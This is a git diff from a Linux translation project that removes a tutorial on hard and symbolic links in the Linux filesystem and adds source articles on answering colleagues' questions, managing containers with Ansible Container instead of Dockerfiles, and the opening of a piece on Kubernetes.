crash with an error specifying the name of the old, now-missing library. Usually, the only change in the library name was the version number. Acting on a hunch, I simply added a link to the new library but named the link after the old library name. I tried the program again and it worked perfectly. And, okay, the program was a game, and everyone knows the lengths that gamers will go to in order to keep their games running. - -In fact, almost all applications are linked to libraries using a generic name with only a major version number in the link name, while the link points to the actual library file that also has a minor version number. In other instances, required files have been moved from one directory to another to comply with the Linux file specification, and there are links in the old directories for backwards compatibility with those programs that have not yet caught up with the new locations. If you do a long listing of the **/lib64** directory, you can find many examples of both. - -``` -lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.hwm -> ../../usr/share/cracklib/pw_dict.hwm -lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.pwd -> ../../usr/share/cracklib/pw_dict.pwd -lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.pwi -> ../../usr/share/cracklib/pw_dict.pwi -lrwxrwxrwx. 1 root root 27 Jun 9 2016 libaccountsservice.so.0 -> libaccountsservice.so.0.0.0 --rwxr-xr-x. 1 root root 288456 Jun 9 2016 libaccountsservice.so.0.0.0 -lrwxrwxrwx 1 root root 15 May 17 11:47 libacl.so.1 -> libacl.so.1.1.0 --rwxr-xr-x 1 root root 36472 May 17 11:47 libacl.so.1.1.0 -lrwxrwxrwx. 1 root root 15 Feb 4 2016 libaio.so.1 -> libaio.so.1.0.1 --rwxr-xr-x. 1 root root 6224 Feb 4 2016 libaio.so.1.0.0 --rwxr-xr-x. 1 root root 6224 Feb 4 2016 libaio.so.1.0.1 -lrwxrwxrwx. 1 root root 30 Jan 16 16:39 libakonadi-calendar.so.4 -> libakonadi-calendar.so.4.14.26 --rwxr-xr-x. 1 root root 816160 Jan 16 16:39 libakonadi-calendar.so.4.14.26 -lrwxrwxrwx. 1 root root 29 Jan 16 16:39 libakonadi-contact.so.4 -> libakonadi-contact.so.4.14.26 -``` - -A few of the links in the **/lib64** directory - -The long listing of the **/lib64** directory above shows that the first character in the filemode is the letter "l," which means that each is a soft or symbolic link. - -### Hard links - -In [An introduction to Linux's EXT4 filesystem][15], I discussed the fact that each file has one inode that contains information about that file, including the location of the data belonging to that file. [Figure 2][16] in that article shows a single directory entry that points to the inode. Every file must have at least one directory entry that points to the inode that describes the file. The directory entry is a hard link, thus every file has at least one hard link. - -In Figure 1 below, multiple directory entries point to a single inode. These are all hard links. I have abbreviated the locations of three of the directory entries using the tilde (**~**) convention for the home directory, so that **~** is equivalent to **/home/user** in this example. Note that the fourth directory entry is in a completely different directory, **/home/shared**, which might be a location for sharing files between users of the computer. - -![fig1directory_entries.png](https://opensource.com/sites/default/files/images/life/fig1directory_entries.png) -Figure 1 - -Hard links are limited to files contained within a single filesystem. "Filesystem" is used here in the sense of a partition or logical volume (LV) that is mounted on a specified mount point, in this case **/home**. This is because inode numbers are unique only within each filesystem, and a different filesystem, for example, **/var**or **/opt**, will have inodes with the same number as the inode for our file. - -Because all the hard links point to the single inode that contains the metadata about the file, all of these attributes are part of the file, such as ownerships, permissions, and the total number of hard links to the inode, and cannot be different for each hard link. It is one file with one set of attributes. The only attribute that can be different is the file name, which is not contained in the inode. Hard links to a single **file/inode** located in the same directory must have different names, due to the fact that there can be no duplicate file names within a single directory. - -The number of hard links for a file is displayed with the **ls -l** command. If you want to display the actual inode numbers, the command **ls -li** does that. - -### Symbolic (soft) links - -The difference between a hard link and a soft link, also known as a symbolic link (or symlink), is that, while hard links point directly to the inode belonging to the file, soft links point to a directory entry, i.e., one of the hard links. Because soft links point to a hard link for the file and not the inode, they are not dependent upon the inode number and can work across filesystems, spanning partitions and LVs. - -The downside to this is: If the hard link to which the symlink points is deleted or renamed, the symlink is broken. The symlink is still there, but it points to a hard link that no longer exists. Fortunately, the **ls** command highlights broken links with flashing white text on a red background in a long listing. - -### Lab project: experimenting with links - -I think the easiest way to understand the use of and differences between hard and soft links is with a lab project that you can do. This project should be done in an empty directory as a  _non-root user_ . I created the **~/temp** directory for this project, and you should, too. It creates a safe place to do the project and provides a new, empty directory to work in so that only files associated with this project will be located there. - -### **Initial setup** - -First, create the temporary directory in which you will perform the tasks needed for this project. Ensure that the present working directory (PWD) is your home directory, then enter the following command. - -``` -mkdir temp -``` - -Change into **~/temp** to make it the PWD with this command. - -``` -cd temp -``` - -To get started, we need to create a file we can link to. The following command does that and provides some content as well. - -``` -du -h > main.file.txt -``` - -Use the **ls -l** long list to verify that the file was created correctly. It should look similar to my results. Note that the file size is only 7 bytes, but yours may vary by a byte or two. - -``` -[dboth@david temp]$ ls -l -total 4 --rw-rw-r-- 1 dboth dboth 7 Jun 13 07:34 main.file.txt -``` - -Notice the number "1" following the file mode in the listing. That number represents the number of hard links that exist for the file. For now, it should be 1 because we have not created any additional links to our test file. - -### **Experimenting with hard links** - -Hard links create a new directory entry pointing to the same inode, so when hard links are added to a file, you will see the number of links increase. Ensure that the PWD is still **~/temp**. Create a hard link to the file **main.file.txt**, then do another long list of the directory. - -``` -[dboth@david temp]$ ln main.file.txt link1.file.txt -[dboth@david temp]$ ls -l -total 8 --rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 link1.file.txt --rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 main.file.txt -``` - -Notice that both files have two links and are exactly the same size. The date stamp is also the same. This is really one file with one inode and two links, i.e., directory entries to it. Create a second hard link to this file and list the directory contents. You can create the link to either of the existing ones: **link1.file.txt** or **main.file.txt**. - -``` -[dboth@david temp]$ ln link1.file.txt link2.file.txt ; ls -l -total 16 --rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 link1.file.txt --rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 link2.file.txt --rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 main.file.txt -``` - -Notice that each new hard link in this directory must have a different name because two files—really directory entries—cannot have the same name within the same directory. Try to create another link with a target name the same as one of the existing ones. - -``` -[dboth@david temp]$ ln main.file.txt link2.file.txt -ln: failed to create hard link 'link2.file.txt': File exists -``` - -Clearly that does not work, because **link2.file.txt** already exists. So far, we have created only hard links in the same directory. So, create a link in your home directory, the parent of the temp directory in which we have been working so far. - -``` -[dboth@david temp]$ ln main.file.txt ../main.file.txt ; ls -l ../main* --rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt -``` - -The **ls** command in the above listing shows that the **main.file.txt** file does exist in the home directory with the same name as the file in the temp directory. Of course, these are not different files; they are the same file with multiple links—directory entries—to the same inode. To help illustrate the next point, add a file that is not a link. - -``` -[dboth@david temp]$ touch unlinked.file ; ls -l -total 12 --rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link1.file.txt --rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link2.file.txt --rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt --rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -Look at the inode number of the hard links and that of the new file using the **-i**option to the **ls** command. - -``` -[dboth@david temp]$ ls -li -total 12 -657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link1.file.txt -657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link2.file.txt -657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -Notice the number **657024** to the left of the file mode in the example above. That is the inode number, and all three file links point to the same inode. You can use the **-i** option to view the inode number for the link we created in the home directory as well, and that will also show the same value. The inode number of the file that has only one link is different from the others. Note that the inode numbers will be different on your system. - -Let's change the size of one of the hard-linked files. - -``` -[dboth@david temp]$ df -h > link2.file.txt ; ls -li -total 12 -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link1.file.txt -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link2.file.txt -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 main.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -The file size of all the hard-linked files is now larger than before. That is because there is really only one file that is linked to by multiple directory entries. - -I know this next experiment will work on my computer because my **/tmp**directory is on a separate LV. If you have a separate LV or a filesystem on a different partition (if you're not using LVs), determine whether or not you have access to that LV or partition. If you don't, you can try to insert a USB memory stick and mount it. If one of those options works for you, you can do this experiment. - -Try to create a link to one of the files in your **~/temp** directory in **/tmp** (or wherever your different filesystem directory is located). - -``` -[dboth@david temp]$ ln link2.file.txt /tmp/link3.file.txt -ln: failed to create hard link '/tmp/link3.file.txt' => 'link2.file.txt': -Invalid cross-device link -``` - -Why does this error occur? The reason is each separate mountable filesystem has its own set of inode numbers. Simply referring to a file by an inode number across the entire Linux directory structure can result in confusion because the same inode number can exist in each mounted filesystem. - -There may be a time when you will want to locate all the hard links that belong to a single inode. You can find the inode number using the **ls -li** command. Then you can use the **find** command to locate all links with that inode number. - -``` -[dboth@david temp]$ find . -inum 657024 -./main.file.txt -./link1.file.txt -./link2.file.txt -``` - -Note that the **find** command did not find all four of the hard links to this inode because we started at the current directory of **~/temp**. The **find** command only finds files in the PWD and its subdirectories. To find all the links, we can use the following command, which specifies your home directory as the starting place for the search. - -``` -[dboth@david temp]$ find ~ -samefile main.file.txt -/home/dboth/temp/main.file.txt -/home/dboth/temp/link1.file.txt -/home/dboth/temp/link2.file.txt -/home/dboth/main.file.txt -``` - -You may see error messages if you do not have permissions as a non-root user. This command also uses the **-samefile** option instead of specifying the inode number. This works the same as using the inode number and can be easier if you know the name of one of the hard links. - -### **Experimenting with soft links** - -As you have just seen, creating hard links is not possible across filesystem boundaries; that is, from a filesystem on one LV or partition to a filesystem on another. Soft links are a means to answer that problem with hard links. Although they can accomplish the same end, they are very different, and knowing these differences is important. - -Let's start by creating a symlink in our **~/temp** directory to start our exploration. - -``` -[dboth@david temp]$ ln -s link2.file.txt link3.file.txt ; ls -li -total 12 -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link1.file.txt -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link2.file.txt -658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> -link2.file.txt -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 main.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -The hard links, those that have the inode number **657024**, are unchanged, and the number of hard links shown for each has not changed. The newly created symlink has a different inode, number **658270**. The soft link named **link3.file.txt**points to **link2.file.txt**. Use the **cat** command to display the contents of **link3.file.txt**. The file mode information for the symlink starts with the letter "**l**" which indicates that this file is actually a symbolic link. - -The size of the symlink **link3.file.txt** is only 14 bytes in the example above. That is the size of the text **link3.file.txt -> link2.file.txt**, which is the actual content of the directory entry. The directory entry **link3.file.txt** does not point to an inode; it points to another directory entry, which makes it useful for creating links that span file system boundaries. So, let's create that link we tried before from the **/tmp** directory. - -``` -[dboth@david temp]$ ln -s /home/dboth/temp/link2.file.txt -/tmp/link3.file.txt ; ls -l /tmp/link* -lrwxrwxrwx 1 dboth dboth 31 Jun 14 21:53 /tmp/link3.file.txt -> -/home/dboth/temp/link2.file.txt -``` - -### **Deleting links** - -There are some other things that you should consider when you need to delete links or the files to which they point. - -First, let's delete the link **main.file.txt**. Remember that every directory entry that points to an inode is simply a hard link. - -``` -[dboth@david temp]$ rm main.file.txt ; ls -li -total 8 -657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link1.file.txt -657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link2.file.txt -658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> -link2.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -The link **main.file.txt** was the first link created when the file was created. Deleting it now still leaves the original file and its data on the hard drive along with all the remaining hard links. To delete the file and its data, you would have to delete all the remaining hard links. - -Now delete the **link2.file.txt** hard link. - -``` -[dboth@david temp]$ rm link2.file.txt ; ls -li -total 8 -657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link1.file.txt -658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> -link2.file.txt -657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 main.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -Notice what happens to the soft link. Deleting the hard link to which the soft link points leaves a broken link. On my system, the broken link is highlighted in colors and the target hard link is flashing. If the broken link needs to be fixed, you can create another hard link in the same directory with the same name as the old one, so long as not all the hard links have been deleted. You could also recreate the link itself, with the link maintaining the same name but pointing to one of the remaining hard links. Of course, if the soft link is no longer needed, it can be deleted with the **rm** command. - -The **unlink** command can also be used to delete files and links. It is very simple and has no options, as the **rm** command does. It does, however, more accurately reflect the underlying process of deletion, in that it removes the link—the directory entry—to the file being deleted. - -### Final thoughts - -I worked with both types of links for a long time before I began to understand their capabilities and idiosyncrasies. It took writing a lab project for a Linux class I taught to fully appreciate how links work. This article is a simplification of what I taught in that class, and I hope it speeds your learning curve. - --------------------------------------------------------------------------------- - -作者简介: - -David Both - David Both is a Linux and Open Source advocate who resides in Raleigh, North Carolina. He has been in the IT industry for over forty years and taught OS/2 for IBM where he worked for over 20 years. While at IBM, he wrote the first training course for the original IBM PC in 1981. He has taught RHCE classes for Red Hat and has worked at MCI Worldcom, Cisco, and the State of North Carolina. He has been working with Linux and Open Source Software for almost 20 years. - ---------------------------------- - -via: https://opensource.com/article/17/6/linking-linux-filesystem - -作者:[David Both ][a] -译者:[runningwater](https://github.com/runningwater) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/dboth -[1]:https://opensource.com/resources/what-is-linux?src=linux_resource_menu -[2]:https://opensource.com/resources/what-are-linux-containers?src=linux_resource_menu -[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=7016000000127cYAAQ -[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?src=linux_resource_menu&intcmp=7016000000127cYAAQ -[5]:https://opensource.com/tags/linux?src=linux_resource_menu -[6]:https://opensource.com/article/17/6/linking-linux-filesystem?rate=YebHxA-zgNopDQKKOyX3_r25hGvnZms_33sYBUq-SMM -[7]:https://opensource.com/user/14106/feed -[8]:https://www.flickr.com/photos/digypho/7905320090 -[9]:https://creativecommons.org/licenses/by/2.0/ -[10]:https://opensource.com/article/17/5/introduction-ext4-filesystem -[11]:https://opensource.com/article/16/11/managing-devices-linux -[12]:https://opensource.com/life/16/10/introduction-linux-filesystems -[13]:https://opensource.com/business/16/9/linux-users-guide-lvm -[14]:https://opensource.com/life/15/9/everything-is-a-file -[15]:https://opensource.com/article/17/5/introduction-ext4-filesystem -[16]:https://opensource.com/article/17/5/introduction-ext4-filesystem#fig2 -[17]:https://opensource.com/users/dboth -[18]:https://opensource.com/article/17/6/linking-linux-filesystem#comments diff --git a/sources/tech/20170921 How to answer questions in a helpful way.md b/sources/tech/20170921 How to answer questions in a helpful way.md new file mode 100644 index 0000000000..8a3601ed06 --- /dev/null +++ b/sources/tech/20170921 How to answer questions in a helpful way.md @@ -0,0 +1,172 @@ +How to answer questions in a helpful way +============================================================ + +Your coworker asks you a slightly unclear question. How do you answer? I think asking questions is a skill (see [How to ask good questions][1]) and that answering questions in a helpful way is also a skill! Both of them are super useful. + +To start out with – sometimes the people asking you questions don’t respect your time, and that sucks. I’m assuming here throughout that that’s not what happening – we’re going to assume that the person asking you questions is a reasonable person who is trying their best to figure something out and that you want to help them out. Everyone I work with is like that and so that’s the world I live in :) + +Here are a few strategies for answering questions in a helpful way! + +### If they’re not asking clearly, help them clarify + +Often beginners don’t ask clear questions, or ask questions that don’t have the necessary information to answer the questions. Here are some strategies you can use to help them clarify. + +* **Rephrase a more specific question** back at them (“Are you asking X?”) + +* **Ask them for more specific information** they didn’t provide (“are you using IPv6?”) + +* **Ask what prompted their question**. For example, sometimes people come into my team’s channel with questions about how our service discovery works. Usually this is because they’re trying to set up/reconfigure a service. In that case it’s helpful to ask “which service are you working with? Can I see the pull request you’re working on?” + +A lot of these strategies come from the [how to ask good questions][2] post. (though I would never say to someone “oh you need to read this Document On How To Ask Good Questions before asking me a question”) + +### Figure out what they know already + +Before answering a question, it’s very useful to know what the person knows already! + +Harold Treen gave me a great example of this: + +> Someone asked me the other day to explain “Redux Sagas”. Rather than dive in and say “They are like worker threads that listen for actions and let you update the store!”  +> I started figuring out how much they knew about Redux, actions, the store and all these other fundamental concepts. From there it was easier to explain the concept that ties those other concepts together. + +Figuring out what your question-asker knows already is important because they may be confused about fundamental concepts (“What’s Redux?”), or they may be an expert who’s getting at a subtle corner case. An answer building on concepts they don’t know is confusing, and an answer that recaps things they know is tedious. + +One useful trick for asking what people know – instead of “Do you know X?”, maybe try “How familiar are you with X?”. + +### Point them to the documentation + +“RTFM” is the classic unhelpful answer to a question, but pointing someone to a specific piece of documentation can actually be really helpful! When I’m asking a question, I’d honestly rather be pointed to documentation that actually answers my question, because it’s likely to answer other questions I have too. + +I think it’s important here to make sure you’re linking to documentation that actually answers the question, or at least check in afterwards to make sure it helped. Otherwise you can end up with this (pretty common) situation: + +* Ali: How do I do X? + +* Jada: + +* Ali: That doesn’t actually explain how to X, it only explains Y! + +If the documentation I’m linking to is very long, I like to point out the specific part of the documentation I’m talking about. The [bash man page][3] is 44,000 words (really!), so just saying “it’s in the bash man page” is not that helpful :) + +### Point them to a useful search + +Often I find things at work by searching for some Specific Keyword that I know will find me the answer. That keyword might not be obvious to a beginner! So saying “this is the search I’d use to find the answer to that question” can be useful. Again, check in afterwards to make sure the search actually gets them the answer they need :) + +### Write new documentation + +People often come and ask my team the same questions over and over again. This is obviously not the fault of the people (how should  _they_  know that 10 people have asked this already, or what the answer is?). So we’re trying to, instead of answering the questions directly, + +1. Immediately write documentation + +2. Point the person to the new documentation we just wrote + +3. Celebrate! + +Writing documentation sometimes takes more time than just answering the question, but it’s often worth it! Writing documentation is especially worth it if: + +a. It’s a question which is being asked again and again b. The answer doesn’t change too much over time (if the answer changes every week or month, the documentation will just get out of date and be frustrating) + +### Explain what you did + +As a beginner to a subject, it’s really frustrating to have an exchange like this: + +* New person: “hey how do you do X?” + +* More Experienced Person: “I did it, it is done.” + +* New person: ….. but what did you DO?! + +If the person asking you is trying to learn how things work, it’s helpful to: + +* Walk them through how to accomplish a task instead of doing it yourself + +* Tell them the steps for how you got the answer you gave them! + +This might take longer than doing it yourself, but it’s a learning opportunity for the person who asked, so that they’ll be better equipped to solve such problems in the future. + +Then you can have WAY better exchanges, like this: + +* New person: “I’m seeing errors on the site, what’s happening?” + +* More Experienced Person: (2 minutes later) “oh that’s because there’s a database failover happening” + +* New person: how did you know that??!?!? + +* More Experienced Person: “Here’s what I did!”: + 1. Often these errors are due to Service Y being down. I looked at $PLACE and it said Service Y was up. So that wasn’t it. + + 2. Then I looked at dashboard X, and this part of that dashboard showed there was a database failover happening. + + 3. Then I looked in the logs for the service and it showed errors connecting to the database, here’s what those errors look like. + +If you’re explaining how you debugged a problem, it’s useful both to explain how you found out what the problem was, and how you found out what the problem wasn’t. While it might feel good to look like you knew the answer right off the top of your head, it feels even better to help someone improve at learning and diagnosis, and understand the resources available. + +### Solve the underlying problem + +This one is a bit tricky. Sometimes people think they’ve got the right path to a solution, and they just need one more piece of information to implement that solution. But they might not be quite on the right path! For example: + +* George: I’m doing X, and I got this error, how do I fix it + +* Jasminda: Are you actually trying to do Y? If so, you shouldn’t do X, you should do Z instead + +* George: Oh, you’re right!!! Thank you! I will do Z instead. + +Jasminda didn’t answer George’s question at all! Instead she guessed that George didn’t actually want to be doing X, and she was right. That is helpful! + +It’s possible to come off as condescending here though, like + +* George: I’m doing X, and I got this error, how do I fix it? + +* Jasminda: Don’t do that, you’re trying to do Y and you should do Z to accomplish that instead. + +* George: Well, I am not trying to do Y, I actually want to do X because REASONS. How do I do X? + +So don’t be condescending, and keep in mind that some questioners might be attached to the steps they’ve taken so far! It might be appropriate to answer both the question they asked and the one they should have asked: “Well, if you want to do X then you might try this, but if you’re trying to solve problem Y with that, you might have better luck doing this other thing, and here’s why that’ll work better”. + +### Ask “Did that answer your question?” + +I always like to check in after I  _think_  I’ve answered the question and ask “did that answer your question? Do you have more questions?”. + +It’s good to pause and wait after asking this because often people need a minute or two to know whether or not they’ve figured out the answer. I especially find this extra “did this answer your questions?” step helpful after writing documentation! Often when writing documentation about something I know well I’ll leave out something very important without realizing it. + +### Offer to pair program/chat in real life + +I work remote, so many of my conversations at work are text-based. I think of that as the default mode of communication. + +Today, we live in a world of easy video conferencing & screensharing! At work I can at any time click a button and immediately be in a video call/screensharing session with someone. Some problems are easier to talk about using your voices! + +For example, recently someone was asking about capacity planning/autoscaling for their service. I could tell there were a few things we needed to clear up but I wasn’t exactly sure what they were yet. We got on a quick video call and 5 minutes later we’d answered all their questions. + +I think especially if someone is really stuck on how to get started on a task, pair programming for a few minutes can really help, and it can be a lot more efficient than email/instant messaging. + +### Don’t act surprised + +This one’s a rule from the Recurse Center: [no feigning surprise][4]. Here’s a relatively common scenario + +* Human 1: “what’s the Linux kernel?” + +* Human 2: “you don’t know what the LINUX KERNEL is?!!!!?!!!???” + +Human 2’s reaction (regardless of whether they’re  _actually_  surprised or not) is not very helpful. It mostly just serves to make Human 1 feel bad that they don’t know what the Linux kernel is. + +I’ve worked on actually pretending not to be surprised even when I actually am a bit surprised the person doesn’t know the thing and it’s awesome. + +### Answering questions well is awesome + +Obviously not all these strategies are appropriate all the time, but hopefully you will find some of them helpful! I find taking the time to answer questions and teach people can be really rewarding. + +Special thanks to Josh Triplett for suggesting this post and making many helpful additions, and to Harold Treen, Vaibhav Sagar, Peter Bhat Harkins, Wesley Aptekar-Cassels, and Paul Gowder for reading/commenting. + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/answer-questions-well/ + +作者:[ Julia Evans][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:https://jvns.ca/blog/good-questions/ +[2]:https://jvns.ca/blog/good-questions/ +[3]:https://linux.die.net/man/1/bash +[4]:https://jvns.ca/blog/2017/04/27/no-feigning-surprise/ diff --git a/sources/tech/20171005 How to manage Linux containers with Ansible Container.md b/sources/tech/20171005 How to manage Linux containers with Ansible Container.md new file mode 100644 index 0000000000..897b793a86 --- /dev/null +++ b/sources/tech/20171005 How to manage Linux containers with Ansible Container.md @@ -0,0 +1,114 @@ +How to manage Linux containers with Ansible Container +============================================================ + +### Ansible Container addresses Dockerfile shortcomings and offers complete management for containerized projects. + +![Ansible Container: A new way to manage containers](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/container-ship.png?itok=pqZYgQ7K "Ansible Container: A new way to manage containers") +Image by : opensource.com + +I love containers and use the technology every day. Even so, containers aren't perfect. Over the past couple of months, however, a set of projects has emerged that addresses some of the problems I've experienced. + +I started using containers with [Docker][11], since this project made the technology so popular. Aside from using the container engine, I learned how to use **[docker-compose][6]** and started managing my projects with it. My productivity skyrocketed! One command to run my project, no matter how complex it was. I was so happy. + +After some time, I started noticing issues. The most apparent were related to the process of creating container images. The Docker tool uses a custom file format as a recipe to produce container images—Dockerfiles. This format is easy to learn, and after a short time you are ready to produce container images on your own. The problems arise once you want to master best practices or have complex scenarios in mind. + +More on Ansible + +* [How Ansible works][1] + +* [Free Ansible eBooks][2] + +* [Ansible quick start video][3] + +* [Download and install Ansible][4] + +Let's take a break and travel to a different land: the world of [Ansible][22]. You know it? It's awesome, right? You don't? Well, it's time to learn something new. Ansible is a project that allows you to manage your infrastructure by writing tasks and executing them inside environments of your choice. No need to install and set up any services; everything can easily run from your laptop. Many people already embrace Ansible. + +Imagine this scenario: You invested in Ansible, you wrote plenty of Ansible roles and playbooks that you use to manage your infrastructure, and you are thinking about investing in containers. What should you do? Start writing container image definitions via shell scripts and Dockerfiles? That doesn't sound right. + +Some people from the Ansible development team asked this question and realized that those same Ansible roles and playbooks that people wrote and use daily can also be used to produce container images. But not just that—they can be used to manage the complete lifecycle of containerized projects. From these ideas, the [Ansible Container][12] project was born. It utilizes existing Ansible roles that can be turned into container images and can even be used for the complete application lifecycle, from build to deploy in production. + +Let's talk about the problems I mentioned regarding best practices in context of Dockerfiles. A word of warning: This is going to be very specific and technical. Here are the top three issues I have: + +### 1\. Shell scripts embedded in Dockerfiles. + +When writing Dockerfiles, you can specify a script that will be interpreted via **/bin/sh -c**. It can be something like: + +``` +RUN dnf install -y nginx +``` + +where RUN is a Dockerfile instruction and the rest are its arguments (which are passed to shell). But imagine a more complex scenario: + +``` +RUN set -eux; \ +    \ +# this "case" statement is generated via "update.sh" +    %%ARCH-CASE%%; \ +    \ +    url="https://golang.org/dl/go${GOLANG_VERSION}.${goRelArch}.tar.gz"; \ +    wget -O go.tgz "$url"; \ +    echo "${goRelSha256} *go.tgz" | sha256sum -c -; \ +``` + +This one is taken from [the official golang image][13]. It doesn't look pretty, right? + +### 2\. You can't parse Dockerfiles easily. + +Dockerfiles are a new format without a formal specification. This is tricky if you need to process Dockerfiles in your infrastructure (e.g., automate the build process a bit). The only specification is [the code][14] that is part of **dockerd**. The problem is that you can't use it as a library. The easiest solution is to write a parser on your own and hope for the best. Wouldn't it be better to use some well-known markup language, such as YAML or JSON? + +### 3\. It's hard to control. + +If you are familiar with the internals of container images, you may know that every image is composed of layers. Once the container is created, the layers are stacked onto each other (like pancakes) using union filesystem technology. The problem is, that you cannot explicitly control this layering—you can't say, "here starts a new layer." You are forced to change your Dockerfile in a way that may hurt readability. The bigger problem is that a set of best practices has to be followed to achieve optimal results—newcomers have a really hard time here. + +### Comparing Ansible language and Dockerfiles + +The biggest shortcoming of Dockerfiles in comparison to Ansible is that Ansible, as a language, is much more powerful. For example, Dockerfiles have no direct concept of variables, whereas Ansible has a complete templating system (variables are just one of its features). Ansible contains a large number of modules that can be easily utilized, such as [**wait_for**][15], which can be used for service readiness checks—e.g., wait until a service is ready before proceeding. With Dockerfiles, everything is a shell script. So if you need to figure out service readiness, it has to be done with shell (or installed separately). The other problem with shell scripts is that, with growing complexity, maintenance becomes a burden. Plenty of people have already figured this out and turned those shell scripts into Ansible. + +If you are interested in this topic and would like to know more, please come to [Open Source Summit][16] in Prague to see [my presentation][17] on Monday, Oct. 23, at 4:20 p.m. in Palmovka room. + + _Learn more in Tomas Tomecek's talk, [From Dockerfiles to Ansible Container][7], at [Open Source Summit EU][8], which will be held October 23-26 in Prague._ + + + +### About the author + + [![human](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/ja.jpeg?itok=4ATUEAbd)][18] Tomas Tomecek - Engineer. Hacker. Speaker. Tinker. Red Hatter. Likes containers, linux, open source, python 3, rust, zsh, tmux.[More about me][9] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/10/dockerfiles-ansible-container + +作者:[Tomas Tomecek ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/tomastomecek +[1]:https://www.ansible.com/how-ansible-works?intcmp=701f2000000h4RcAAI +[2]:https://www.ansible.com/ebooks?intcmp=701f2000000h4RcAAI +[3]:https://www.ansible.com/quick-start-video?intcmp=701f2000000h4RcAAI +[4]:https://docs.ansible.com/ansible/latest/intro_installation.html?intcmp=701f2000000h4RcAAI +[5]:https://opensource.com/article/17/10/dockerfiles-ansible-container?imm_mid=0f9013&cmp=em-webops-na-na-newsltr_20171201&rate=Wiw_0D6PK_CAjqatYu_YQH0t1sNHEF6q09_9u3sYkCY +[6]:https://github.com/docker/compose +[7]:http://sched.co/BxIW +[8]:http://events.linuxfoundation.org/events/open-source-summit-europe +[9]:https://opensource.com/users/tomastomecek +[10]:https://opensource.com/user/175651/feed +[11]:https://opensource.com/tags/docker +[12]:https://www.ansible.com/ansible-container +[13]:https://github.com/docker-library/golang/blob/master/Dockerfile-debian.template#L14 +[14]:https://github.com/moby/moby/tree/master/builder/dockerfile +[15]:http://docs.ansible.com/wait_for_module.html +[16]:http://events.linuxfoundation.org/events/open-source-summit-europe +[17]:http://events.linuxfoundation.org/events/open-source-summit-europe/program/schedule +[18]:https://opensource.com/users/tomastomecek +[19]:https://opensource.com/users/tomastomecek +[20]:https://opensource.com/users/tomastomecek +[21]:https://opensource.com/article/17/10/dockerfiles-ansible-container?imm_mid=0f9013&cmp=em-webops-na-na-newsltr_20171201#comments +[22]:https://opensource.com/tags/ansible +[23]:https://opensource.com/tags/containers +[24]:https://opensource.com/tags/ansible +[25]:https://opensource.com/tags/docker +[26]:https://opensource.com/tags/open-source-summit diff --git a/sources/tech/20171005 Reasons Kubernetes is cool.md b/sources/tech/20171005 Reasons Kubernetes is cool.md new file mode 100644 index 0000000000..a9d10b9cdb --- /dev/null +++ b/sources/tech/20171005 Reasons Kubernetes is cool.md @@ -0,0 +1,148 @@ +Reasons Kubernetes is cool +============================================================ + +When I first learned about Kubernetes (a year and a half ago?) I really didn’t understand why I should care about it. + +I’ve been working full time with Kubernetes for 3 months or so and now have some thoughts about why I think it’s useful. (I’m still very far from being a Kubernetes expert!) Hopefully this will help a little in your journey to understand what even is going on with Kubernetes! + +I will try to explain some reason I think Kubenetes is interesting without using the words “cloud native”, “orchestration”, 